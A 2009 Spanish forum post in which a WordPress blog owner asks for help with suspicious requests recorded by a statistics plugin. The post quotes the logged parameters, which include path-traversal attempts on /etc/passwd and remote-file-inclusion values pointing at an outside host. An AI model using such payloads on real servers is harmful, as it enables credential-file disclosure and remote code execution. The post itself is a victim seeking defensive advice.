Tema: Accesos extraños a mi blog
Ver Mensaje Individual
  #1 (permalink)  
Antiguo 26/04/2009, 13:08
Avatar de Lecquio
Lecquio
 
Fecha de Ingreso: mayo-2004
Ubicación: Asturias, España
Mensajes: 948
Antigüedad: 20 años
Puntos: 34
Exclamación Accesos extraños a mi blog
Hola maestros.

Tengo un blog hecho con Wordpress 2.7.1 y el plugin para ver estadísticas Statpress Reloaded, que da información sobre la IP del visitante y a que paginas accede, entre otras muchas cosas.

Pues bien, consultando estas estadisticas he visto que tengo varios accesos desde la IP 153.19.97.135 a estas direcciones:

""cfg[path][contenido]=../../../../../../../../etc/passwd""
""cfg[path][contenido]=http://www.suburbane.org//cgi (mi dominio NO es suburbane.org)
""abspath=../../../../../../../../etc/passwd""
""abspath=http://www.suburbane.org//cgi-bin?""
""mosConfig_live_site=../../../../../../../../etc/passwd""
""mosConfig_live_site=http://www.suburbane.org//cgi-bin?""
""phpbb_root_path=../../../../../../../../etc/passwd""
""phpbb_root_path=http://www.suburbane.org//cgi-bin?""

Parece que quieren acceder al fichero de contraseñas del servidor e insertar algo en el mediante un cgi de suburbane, o eso entiendo yo, que más bien entiendo poco ¿vosotros sabeis que significa exactamente?
¿mi fichero de contraseñas correo algun peligro?
¿hay alguna vulnerabilidad conocida en wordpress que deba preocuparme?

Gracias.